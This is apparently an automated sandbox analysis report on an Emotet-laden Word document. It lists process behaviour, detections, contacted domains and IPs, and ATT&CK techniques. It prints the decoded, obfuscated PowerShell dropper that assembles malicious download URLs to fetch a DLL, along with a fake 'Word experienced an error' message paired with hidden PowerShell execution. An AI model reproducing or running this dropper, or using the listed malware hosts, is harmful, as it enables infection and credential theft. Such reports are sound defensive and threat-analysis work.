                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_0023C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 8_2_001EC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_001DC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 10_2_0027C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 11_2_001AC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 12_2_006CC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 13_2_001EC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0022C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 5.2.136.90 80
                      Encrypted powershell cmdline option found
                      Source: unknownProcess created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'cJump to behavior
                      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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 to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Czsbnlmzhou\heljhxhmap.nib',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tshsltpdkbydgac\umncisajimhcut.zje',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nrnhwjwgkqopncg\hahzpwlqhuedal.zvs',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wcuhm\nost.bdw',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omzikkfxzmn\texvcnoeud.iob',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Afhsry\advki.tth',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tjgkecgvqxx\dxuouhyssc.uio',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_10004C5A cpuid
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe, Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter
                      Source: C:\Windows\SysWOW64\rundll32.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected Emotet

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 11 | Path Interception | Process Injection 111 | Disable or Modify Tools 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scripting 32 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 3 | LSASS Memory | File and Directory Discovery 3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Native API 1 | Logon Script (Windows) | Logon Script (Windows) | Scripting 32 | Security Account Manager | System Information Discovery 26 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | Exploitation for Client Execution 3 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Security Software Discovery 31 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Command and Scripting Interpreter 211 | Network Logon Script | Network Logon Script | Masquerading 11 | LSA Secrets | Virtualization/Sandbox Evasion 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | PowerShell 3 | Rc.common | Rc.common | Virtualization/Sandbox Evasion 2 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 111 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll32 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph

                      [Figure: behavior graph. Behavior Graph ID: 336489; Sample: pack-91089 416755919.doc; Startdate: 06/01/2021; Architecture: WINDOWS; Score: 100]

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

| Source | Detection | Scanner | Label |
|---|---|---|---|
| pack-91089 416755919.doc | 37% | Virustotal | |
| pack-91089 416755919.doc | 43% | ReversingLabs | Document-Word.Trojan.Heuristic |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 8.2.rundll32.exe.1e0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 12.2.rundll32.exe.6c0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 9.2.rundll32.exe.1d0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 10.2.rundll32.exe.270000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 7.2.rundll32.exe.230000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 14.2.rundll32.exe.220000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 13.2.rundll32.exe.1e0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 11.2.rundll32.exe.1a0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |

                      Domains

                      No Antivirus matches

                      URLs

| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://veterinariadrpopui.com | 0% | Avira URL Cloud | safe |
| http://veterinariadrpopui.com/content/5f18Q/ | 100% | Avira URL Cloud | malware |
| http://sofsuite.com/wp-includes/2jm3nIk/ | 0% | Avira URL Cloud | safe |
| http://khanhhoahomnay.net/wordpress/CGMC/ | 100% | Avira URL Cloud | malware |
| http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
| https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/ | 0% | Avira URL Cloud | safe |
| http://5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/ | 0% | Avira URL Cloud | safe |
| http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe |
| http://shop.elemenslide.com | 0% | Avira URL Cloud | safe |
| http://khanhhoahomnay.net | 0% | Avira URL Cloud | safe |
| http://shop.elemenslide.com/wp-content/n/ | 100% | Avira URL Cloud | malware |
| http://sofsuite.com | 0% | Avira URL Cloud | safe |
| http://wpsapk.com | 0% | Avira URL Cloud | safe |
| http://www.%s.comPA | 0% | URL Reputation | safe |
| http://wpsapk.com/wp-admin/v/ | 0% | Avira URL Cloud | safe |

                      Domains and IPs

                      Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| veterinariadrpopui.com | 209.59.139.39 | true | true | | unknown |
| wpsapk.com | 104.18.61.59 | true | true | | unknown |
| sofsuite.com | 104.27.145.251 | true | true | | unknown |
| khanhhoahomnay.net | 210.86.239.69 | true | true | | unknown |
| shop.elemenslide.com | unknown | unknown | true | | unknown |

                                Contacted URLs

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://veterinariadrpopui.com/content/5f18Q/ | true | Avira URL Cloud: malware | unknown |
| http://sofsuite.com/wp-includes/2jm3nIk/ | true | Avira URL Cloud: safe | unknown |
| http://khanhhoahomnay.net/wordpress/CGMC/ | true | Avira URL Cloud: malware | unknown |
| http://5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/ | true | Avira URL Cloud: safe | unknown |
| http://wpsapk.com/wp-admin/v/ | true | Avira URL Cloud: safe | unknown |

                                URLs from Memory and Binaries

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://www.windows.com/pctv. | rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmp | false | | high |
| http://veterinariadrpopui.com | powershell.exe, 00000005.00000002.2113375099.0000000003A6E000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown |
| http://investor.msn.com | rundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmp | false | | high |
| http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmp | false | | high |
| http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000006.00000002.2114950190.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108832801.00000000023E7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://www.hotmail.com/oe | rundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmp | false | | high |
| https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/ | powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown |
| https://www.cloudflare.com/5xx-error-landing | powershell.exe, 00000005.00000002.2113375099.0000000003A6E000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2113102392.0000000003A07000.00000004.00000001.sdmp | false | | high |
| http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000006.00000002.2114950190.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108832801.00000000023E7000.00000002.00000001.sdmp | false | | high |
| http://www.icra.org/vocabulary/. | rundll32.exe, 00000006.00000002.2114950190.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108832801.00000000023E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109391718.0000000001FE7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000005.00000002.2105665763.0000000002420000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110083444.00000000028B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2111681625.00000000027C0000.00000002.00000001.sdmp | false | | high |
| http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000005.00000002.2104363576.0000000000294000.00000004.00000020.sdmp | false | | high |
| http://shop.elemenslide.com | powershell.exe, 00000005.00000002.2113549064.0000000003AA9000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown |
| http://khanhhoahomnay.net | powershell.exe, 00000005.00000002.2113549064.0000000003AA9000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown |
| http://shop.elemenslide.com/wp-content/n/ | powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown |
| http://investor.msn.com/ | rundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmp | false | | high |
| http://sofsuite.com | powershell.exe, 00000005.00000002.2113132741.0000000003A23000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown |
| http://wpsapk.com | powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown |
| http://www.piriform.com/ccleaner | powershell.exe, 00000005.00000002.2104348720.0000000000264000.00000004.00000020.sdmp | false | | high |
| http://www.%s.comPA | powershell.exe, 00000005.00000002.2105665763.0000000002420000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110083444.00000000028B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2111681625.00000000027C0000.00000002.00000001.sdmp | false | URL Reputation: safe | low |

                                                    Contacted IPs

                                                    Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 104.27.145.251 | unknown | United States | 13335 | CLOUDFLARENETUS | true |
| 210.86.239.69 | unknown | Viet Nam | 24173 | NETNAM-AS-APNetnamCompanyVN | true |
| 209.59.139.39 | unknown | United States | 32244 | LIQUIDWEBUS | true |
| 104.18.61.59 | unknown | United States | 13335 | CLOUDFLARENETUS | true |
| 5.2.136.90 | unknown | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | true |

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                    Analysis ID:336489
                                                    Start date:06.01.2021
                                                    Start time:08:35:59
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 20s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:pack-91089 416755919.doc
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:16
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • GSI enabled (VBA)
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.expl.evad.winDOC@24/8@7/5
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 75.7% (good quality ratio 72.5%)
                                                    • Quality average: 75.2%
                                                    • Quality standard deviation: 25.7%
                                                    HCA Information:
                                                    • Successful, ratio: 91%
                                                    • Number of executed functions: 134
                                                    • Number of non-executed functions: 90
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .doc
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Found warning dialog
                                                    • Click Ok
                                                    • Attach to Office via COM
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

| Time | Type | Description |
|---|---|---|
| 08:36:41 | API Interceptor | 1x Sleep call for process: msg.exe modified |
| 08:36:42 | API Interceptor | 64x Sleep call for process: powershell.exe modified |
| 08:36:49 | API Interceptor | 896x Sleep call for process: rundll32.exe modified |

                                                    Joe Sandbox View / Context

                                                    IPs


                                                    Domains


                                                    ASN

                                                    • 104.16.115.104
                                                    HSBC Payment Advice - HSBC67628473234[20201412].exeGet hashmaliciousBrowse
                                                    • 172.67.156.125
                                                    http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                                    • 104.18.225.52
                                                    https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                                    • 104.18.70.113
                                                    http://p1.pagewiz.net/w5c8j120/Get hashmaliciousBrowse
                                                    • 104.16.19.94
                                                    Og8qU1smzy.exeGet hashmaliciousBrowse
                                                    • 162.159.138.232
                                                    https://nimb.ws/10IXxlGet hashmaliciousBrowse
                                                    • 104.26.3.186
                                                    https://www.canva.com/design/DAESYWKuLHs/avvDNRvDuj_tk82H9Q45ZQ/view?utm_content=DAESYWKuLHs&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                    • 104.17.115.17
                                                    CLOUDFLARENETUSPayment Documents.xlsGet hashmaliciousBrowse
                                                    • 104.22.1.232
                                                    Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                                                    • 104.22.1.232
                                                    QPI-01458.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    LITmNphcCA.exeGet hashmaliciousBrowse
                                                    • 104.28.5.151
                                                    http://fake-cash-app-screenshot-generator.hostforjusteasy.funGet hashmaliciousBrowse
                                                    • 172.67.179.45
                                                    http://download2224.mediafire.com/5rqvtr7atabg/4ufxk777x7qfcdd/FastStoneCapturePortableTW_9.0_azo.exeGet hashmaliciousBrowse
                                                    • 104.16.203.237
                                                    http://click.freshwaterlive.info/campaign/clicked/MjgzNjAxMzU%3D__MTAxOA%3D%3D__MjY3NzY5Ng%3D%3D__MjI2/aHR0cDovL2JpdC5seS8ySk1GMUJk?c=28360135Get hashmaliciousBrowse
                                                    • 104.16.19.94
                                                    https://awattorneys-my.sharepoint.com/:b:/p/fgalante/EcRfEpzLM_tOh_Roewbwm9oB4JarWh_30QaPZLGUdNbnuw?e=4%3aqmwocp&at=9Get hashmaliciousBrowse
                                                    • 104.16.18.94
                                                    http://reppoflag.net/2307e0382f77c950a2.jsGet hashmaliciousBrowse
                                                    • 172.64.170.19
                                                    https://firebasestorage.googleapis.com/v0/b/blckaxe.appspot.com/o/general%20page.html?alt=media&token=b4029a1b-78f5-43ff-a7eb-d4555ad6a60e#kymo@willowoodusa.comGet hashmaliciousBrowse
                                                    • 104.16.18.94
                                                    http://hoquetradersltd.com/jordanbruce/index.phpGet hashmaliciousBrowse
                                                    • 104.16.18.94
                                                    https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                                    • 104.18.70.113
                                                    https://preview.hs-sites.com/_hcms/preview/template/multi?domain=undefined&hs_preview_key=SlyW7XnGAffndKslJ_Oq0Q&portalId=8990448&tc_deviceCategory=undefined&template_file_path=mutli/RFQ.htmlGet hashmaliciousBrowse
                                                    • 104.16.115.104
                                                    HSBC Payment Advice - HSBC67628473234[20201412].exeGet hashmaliciousBrowse
                                                    • 172.67.156.125
                                                    http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                                    • 104.18.225.52
                                                    https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                                    • 104.18.70.113
                                                    http://p1.pagewiz.net/w5c8j120/Get hashmaliciousBrowse
                                                    • 104.16.19.94
                                                    Og8qU1smzy.exeGet hashmaliciousBrowse
                                                    • 162.159.138.232
                                                    https://nimb.ws/10IXxlGet hashmaliciousBrowse
                                                    • 104.26.3.186
                                                    https://www.canva.com/design/DAESYWKuLHs/avvDNRvDuj_tk82H9Q45ZQ/view?utm_content=DAESYWKuLHs&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                    • 104.17.115.17

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{43B9F0D0-FFD8-4816-B513-C2DC6937B540}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
